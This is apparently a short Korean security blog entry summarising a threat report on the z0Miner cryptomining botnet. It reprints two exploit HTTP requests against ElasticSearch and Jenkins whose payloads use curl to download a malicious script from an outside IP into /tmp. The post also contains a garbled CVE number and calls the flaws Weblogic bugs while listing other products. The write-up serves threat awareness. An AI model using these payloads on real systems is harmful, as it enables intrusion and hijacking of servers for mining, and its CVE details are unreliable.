[하루한줄] z0Miner: Mining Botnet Spreading quickly

URL

Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities

Explain

최근 비트코인의 상승과 함께 다양한 채굴 봇넷 공격이 늘어났습니다. 대부분 감염 방식을 바꿨을 뿐 오래된 봇넷이며 그중 z0Miner도 포함되어 있습니다. z0Miner는 2가지 Weblogic RCE 취약점을 사용해 전파됩니다. z0Miner는 아래 두 취약점을 사용해 타겟 시스템에 hxxp://27.1.1.34:8080/docs/conf.txt를 설치하고 실행합니다.

  1. ElasticSearch RCE (CVE-2021-2015-1427)

    POST /{VULN_URI} HTTP/1.1
    Host: {target}:{port}
    
    {...exec(\"curl -fsSL http://27.1.1.34:8080/docs/conf.txt -o /tmp/baby\")...}
  1. Jenkins script console RCE

    POST /{VULN_URI} HTTP/1.1
    Host: {target}:{port}
    
    curl+-fsSL+http%3A%2F%2F27.1.1.34:8080%2Fdocs%2Fconf.txt+-o+%2Ftmp%2Fsolr%22.execute%28%29.text&json=%7B%22script%22%3A+%22println+%5C%22curl+-fsSL+http%3A%2F%2F27.1.1.34:8080%2Fdocs%2Fconf.txt+-o+%2Ftmp%2Fsolr%5C%22.execute%28%29.text%22%2C+%22%22%3A+%22%22%7D&Submit=Run

타겟 시스템에 설치된 hxxp://27.1.1.34:8080/docs/conf.txt는 다음과 같은 동작을 합니다.

  1. 타겟 시스템에 다른 채굴 봇넷이 존재하면 그 봇넷을 종료
  2. 추가 악성 스크립트를 설치
  3. 채굴 프로그램 설치 및 실행